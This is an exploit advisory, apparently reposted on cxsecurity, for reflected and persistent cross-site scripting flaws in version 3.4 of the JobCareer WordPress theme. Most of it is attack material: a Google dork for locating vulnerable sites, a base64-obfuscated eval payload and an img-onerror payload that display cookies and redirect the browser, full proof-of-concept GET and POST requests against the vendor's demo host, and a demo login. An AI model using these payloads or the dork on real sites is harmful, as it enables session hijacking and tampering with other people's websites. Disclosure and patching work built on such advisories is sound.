JobCareer | Job Board Responsive WordPress Theme v3.4 - Multiple Vulnerabilities

2020.07.27
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

[+] Exploit Title: JobCareer | Job Board Responsive WordPress Theme v3.4 - Multiple Vulnerabilities [+] Google Dork: inurl:/wp-content/themes/jobcareer/ [+] Date: 2020-07-24 [+] Exploit Author: Vlad Vector [ https://vladvector.ru ] [+] Vendor: Chimp Studio [ https://chimpgroup.com ] [+] Software Version: 3.4 [+] Software Link: https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636 [+] Tested on: Debian 10 [+] CVE: [+] CWE: CWE-79 ### [ Info: ] [i] An Unauthenticated Reflected & Authenticated Persistent XSS vulnerabilities was discovered in the JobCareer theme through 3.4 for WordPress. [i] Unauthenticated Reflected XSS -> Vulnerable parameters: job_title, specialisms, location [i] Authenticated Persistent XSS on Employer Profile -> «Complete Address» text field [i] Demo account: vladvector / vector (login / password) [i] PoC Employer Profile URL: http://jobcareer.chimpgroup.com/employer/vladvector/ ### [ Vulnerabilities: ] [x] Unauthenticated Reflected XSS [x] Authenticated Persistent XSS ### [ Payloads: ] [$] "><svg/onload=eval(atob(`amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7`))> [$] "><!--<img src="--><img src=x onerror=(alert)(`VLADVECTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru/`;//"> ### [ PoC Unauthenticated Reflected XSS: ] [!] http://jobcareer.chimpgroup.com/jobs-modern-list/?job_title=%22%3E%3Csvg%2Fonload%3Deval%28atob%28%60amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7%60%29%29%3E&specialisms=&cs_search_location_field=&location=&radius=5&cs_=&cs_=Find+Job [!] GET /jobs-modern-list/?job_title=%22%3E%3Csvg%2Fonload%3Deval%28atob%28%60amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7%60%29%29%3E&specialisms=&cs_search_location_field=&location=&radius=5&cs_=&cs_=Find+Job HTTP/1.1 Host: jobcareer.chimpgroup.com ### [ PoC Authenticated Persistent XSS -> Employer Profile: ] [!] POST /wp-admin/admin-ajax.php HTTP/1.1 Host: jobcareer.chimpgroup.com X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------373898295520776006712397621876 Content-Length: 3832 Origin: http://jobcareer.chimpgroup.com Referer: http://jobcareer.chimpgroup.com/employer-account/?profile_tab=profile Cookie: [cookies_here] -----------------------------373898295520776006712397621876 Content-Disposition: form-data; name="media_upload" undefined -----------------------------373898295520776006712397621876 Content-Disposition: form-data; name="cover_media_upload" undefined -----------------------------373898295520776006712397621876 Content-Disposition: form-data; name="cs_employer_img" -----------------------------373898295520776006712397621876 Content-Disposition: form-data; name="cs_cover_employer_img" -----------------------------373898295520776006712397621876 Content-Disposition: form-data; name="display_name" VladVector -----------------------------373898295520776006712397621876 Content-Disposition: form-data; name="cs_allow_search" yes -----------------------------373898295520776006712397621876 Content-Disposition: form-data; name="cs_specialisms[]" banking -----------------------------373898295520776006712397621876 Content-Disposition: form-data; name="comp_detail" -----------------------------373898295520776006712397621876 Content-Disposition: form-data; name="cs_facebook" -----------------------------373898295520776006712397621876 Content-Disposition: form-data; name="cs_twitter" -----------------------------373898295520776006712397621876 Content-Disposition: form-data; name="cs_linkedin" -----------------------------373898295520776006712397621876 Content-Disposition: form-data; name="cs_phone_number" 1337 -----------------------------373898295520776006712397621876 Content-Disposition: form-data; name="user_email" wihovo6827@invql.com -----------------------------373898295520776006712397621876 Content-Disposition: form-data; name="user_url" -----------------------------373898295520776006712397621876 Content-Disposition: form-data; name="cs_post_loc_country" -----------------------------373898295520776006712397621876 Content-Disposition: form-data; name="cs_post_loc_city" -----------------------------373898295520776006712397621876 Content-Disposition: form-data; name="cs_post_comp_address" "><!--<img src="--><img src=x onerror=(alert)(`VLAD\x20VECTOR`);window.location=`https://vladvector.ru/`;//"> -----------------------------373898295520776006712397621876 Content-Disposition: form-data; name="cs_post_loc_address" -----------------------------373898295520776006712397621876 Content-Disposition: form-data; name="cs_post_loc_latitude" 51.5073509 -----------------------------373898295520776006712397621876 Content-Disposition: form-data; name="cs_post_loc_longitude" -0.12775829999998223 -----------------------------373898295520776006712397621876 Content-Disposition: form-data; name="cs_add_new_loc" -----------------------------373898295520776006712397621876 Content-Disposition: form-data; name="cs_post_loc_zoom" 11 -----------------------------373898295520776006712397621876 Content-Disposition: form-data; name="cs_cus_field[established]" 1337 -----------------------------373898295520776006712397621876 Content-Disposition: form-data; name="cs_cus_field[team-size]" 1337 -----------------------------373898295520776006712397621876 Content-Disposition: form-data; name="cs_cus_field[type]" private -----------------------------373898295520776006712397621876 Content-Disposition: form-data; name="user_profile" update_profile -----------------------------373898295520776006712397621876 Content-Disposition: form-data; name="cs_user" 12919 -----------------------------373898295520776006712397621876 Content-Disposition: form-data; name="action" ajax_employer_form_save -----------------------------373898295520776006712397621876 Content-Disposition: form-data; name="post_id" 12919 -----------------------------373898295520776006712397621876-- ### [ Contacts: ] [#] Website: vladvector.ru [#] Telegram: @vladvector [#] Twitter: @vlad_vector [#] GitHub: @vladvector

References:

https://github.com/vladvector/vladvector.github.io/blob/master/exploit/2020-07-24-jobcareer-job-board-responsive-wordpress-theme-v3-4.txt
https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top